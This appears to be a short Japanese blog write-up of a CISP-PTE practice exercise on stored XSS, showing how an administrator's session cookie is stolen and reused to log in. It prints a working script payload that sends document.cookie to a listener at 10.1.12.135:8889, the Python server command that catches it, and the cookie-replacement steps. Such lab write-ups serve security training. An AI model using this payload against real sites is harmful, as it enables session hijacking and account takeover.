banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

cisp-pte xss問題

Xss の主な焦点は、管理者のクッキーを取得し、その後、偽の管理者のクッキーを使用してログインすることです。

以下は、インターフェースです。

img

上の図の「Test」をクリックしてメッセージを残すことができます。

img

クッキーを取得するための XSS ペイロードを準備します。

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Web サーバーを起動し、クッキーを受け取ります。

Python -m SimpleHTTPServer 8889

img

ペイロードを入力ボックスに書き込みます。

img

「Submit Query」をクリックします。

待つ

Python がクッキーを受け取ったかどうかを確認します。

img

クッキーをコピーします。

1acb0fb952b3caaf1ab7277511923138

img

クッキーの値を置き換えます。

img

「Edit」をクリックして置き換えます。

img

ページを更新し、管理者をクリックします。

img

ログインに成功し、キーを取得しました。

wps10

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。